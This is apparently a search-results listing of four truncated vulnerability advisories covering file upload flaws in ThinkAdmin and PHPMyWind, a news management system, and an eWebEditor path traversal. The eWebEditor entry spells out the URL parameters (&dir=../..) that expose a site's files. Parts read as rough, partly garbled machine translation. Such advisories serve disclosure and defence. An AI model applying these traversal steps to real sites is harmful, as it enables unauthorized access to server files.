4 matches found
PT-2023-31020 · Unknown · Thinkadmin
Name of the Vulnerable Software and Affected Versions: ThinkAdmin version 6.1.53
Description: An arbitrary file upload issue in the /admin/api.upload/file component allows attackers to execute arbitrary code via a crafted Zip file.
Recommendations: For ThinkAdmin version 6.1.53, consider disablin...
CVE-2020-18886
Unrestricted File Upload in PHPMyWind v5.6 allows remote attackers to execute arbitrary code via the component 'admin/uploadfiledo.php'...
News website management system vulnerability - vulnerability warning - the black bar safety net
News website management system vulnerabilities author: xk8888888 This system has N of the Year Edition, General government, schools and enterprises with much more, Special permit: to display news NewsView.asp?NewsID= Login login.asp?id=3, The main special permit is available one has a EDIT the...
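eWebEditor path traversal vulnerability
eWebEditor is a WYSIWYG online editor. As the name suggests, it allows WYSIWYG editing on the web for a range of text-processing uses such as illustrated articles, news, discussion posts, announcements and notes. ewebeditor/adminuploadfile.asp filters input insufficiently, which results in a path traversal vulnerability. eWebEditor None yet http://www.ewebeditor.net/ ewebeditor/adminuploadfile.asp?id=14 After id=14, append &dir=.. then add &dir=../.. &dir=http://www..com/../.. and the files of the entire website are visible...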